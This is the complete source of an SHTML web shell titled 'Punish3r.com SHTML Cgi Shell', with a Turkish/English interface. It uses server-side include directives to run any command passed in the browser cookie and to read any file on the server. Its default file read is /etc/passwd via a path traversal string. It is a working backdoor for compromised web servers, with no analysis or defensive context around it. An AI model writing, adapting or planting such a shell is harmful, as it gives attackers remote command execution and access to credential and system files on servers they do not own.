ss.shtml

1. <!--#config errmsg="[Error in shell]"-->
2. <!--#config sizefmt="bytes"-->
3.  
4. <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"GET\")" -->
5.     <!--#set var="shl" value="ls -al" -->
6. <!--#else -->
7.     <!--#set var="shl" value=$HTTP_COOKIE -->
8. <!--#endif -->
9.  
10. <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"POST\")" -->
11.     <!--#set var="inc" value="/../../../../../../../etc/passwd" -->
12. <!--#else -->
13.     <!--#set var="inc" value=$HTTP_COOKIE -->
14. <!--#endif -->
15. <html>
16. <head>
17. <meta http-equiv="Content-Language" content="en-us">
18. <meta charset="UTF-8"/>
19. <title>Punish3r.com SHTML Cgi Shell</title>
20. <style>
21. <!--
22. body         { font-family: Tahoma; font-size: 8pt }
23. -->
24. body {font-family: Tahoma; font-size: 8pt;background-color:#00000e;color:white;text-shadow:0px 0px 1px white;}
25. a {font-size:15px;color:orange;}
26. </style>
27. <script language="javascript">
28. function doit( mode ) {
29.     if( document.cookie != "" ) {
30.         var cookies = document.cookie.split( ";" );
31.         for( var i = 0; i < cookies.length; ++i )  
32.            document.cookie = cookies[ i ] + ";expires=Thu, 01 Jan 1970 00:00:00 GMT";
33.    }
34.    document.cookie = document.getElementById( mode ).value;
35.    document.location.reload();
36. }
37. function toggle( id ) {
38.    document.getElementById( id ).style.display = (document.getElementById( id ).style.display == "none") ? "block" : "none";
39. }
40. </script>
41. </head>
42. <body>
43. <div align="center">
44.     <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
45.         <tr>
46.             <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
47.                 <p align="center"><b>
48.                 <font face="Tahoma" size="2"><br>
49.                 </font>
50.                 <font color="#e6e6e6" face="Tahoma" size="2">
51.                 <span style="text-decoration: none">
52.                 <font color="#FFFFFF">
53.                 <span style="text-decoration: none"><font onclick="toggle('inf');" style="cursor:hand;" color="#FFFFFF">Server Detayları / Server Details</font></span></font></span></font></b></p>
54.                 <p align="center"><b>
55.                 <font onclick="toggle('shl');" style="cursor:hand;" face="Tahoma" size="2" color="#FFFFFF">
56.                 <span style="text-decoration: none">Command / Komut</span></font></b></p>
57.                 <p align="center"><b>
58.                 <font face="Tahoma" size="2" color="#FFFFFF">
59.                 <span style="text-decoration: none"><font onclick="toggle('inc');" style="cursor:hand;" color="#FFFFFF">Dosya Oku / File Views</font></span></font></b></p>
60.                 <p>&nbsp;<p align="center">&nbsp;</td>
61.             <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
62.             <font color='#FFFFFF' size='2'>Sofware : <!--#echo var="SERVER_SOFTWARE" --><br>IP :<!--#echo var="REMOTE_ADDR" --></font><br>
63.             <font face='Arial Black' color='#FFFFFF' size='1'>
64. ***************************************************************************<br>
65. <div id="inf" style=""><br>
66. <b><font color="white">Bağlanan Sunucu / Connect Server</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var="SERVER_NAME" --></b><br>
67. <b><font color="white">İp Adresiniz / I.P Remote</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var="REMOTE_ADDR" --></b><br>
68. <b><font color="white">Sunucu / Server Software</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var="SERVER_SOFTWARE" --></b><br>
69. <b><font color="white">Bulunduğun Dizin / My Documanet Dir</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var="DOCUMENT_ROOT" --></b><br>
70. <br></div>
71. <div  border="0" id="shl" style=""<!--#if expr="\"$REQUEST_METHOD\" != \"GET\"" -->display:block;<!--#endif -->>
72. <br><b><font color="white">Enter command / Komut Giriniz</font></b>:&nbsp;&nbsp;&nbsp;<form method=get onsubmit=doit('command');><input type=text size=80 value=dir id=command>&nbsp;<input type=submit value=Command></form><br>
73. <center><b><font size=+1>Result / Sonuç</font></b></center>
74. <br>
75. <b><font color="white">Executed command / Uygulanan Komut</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
76. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
77. <!--#exec cmd=$shl -->
78. </textarea>
79. </div>
80. <div id="inc" style="display:none"><!--#if expr="\"$REQUEST_METHOD\" != \"POST\"" --><!--#endif --><br>
81. <b><font color="white">Okunacak Dosya / Enter The File </font></b>:&nbsp;&nbsp;&nbsp;<form method=post onsubmit=doit('vfile');><input type=text size=80 id=vfile>&nbsp;<input type=submit value=Run></form><br>
82. <b><font color="white">Okunan Dosya / Open The File</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
83. <b><font color="white">Boyutu / Size </font></b>:&nbsp;&nbsp;&nbsp;<b><!--#fsize virtual=$inc -->&nbsp;bytes</b><br>
84. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
85. <!--#include virtual=$inc -->
86. </textarea>
87. <br></div>
88. ***************************************************************************</font></span></p>
89.  
90.            
91.             </td>
92.         </tr>
93.         <tr>
94.             <td style="border: 1px dotted #FFCC66">
95.             <p align="center"><font color="orange" size="2" face="Tahoma"><br>
96.             Copyright 2013 -  x-hayben21<br><a href="http://punish3r.com">www.punish3r.com</a>
97.                   <br>
98.             </font></td>
99.         </tr>
100.     </table>
101. </div>
102. </body>
103. </html>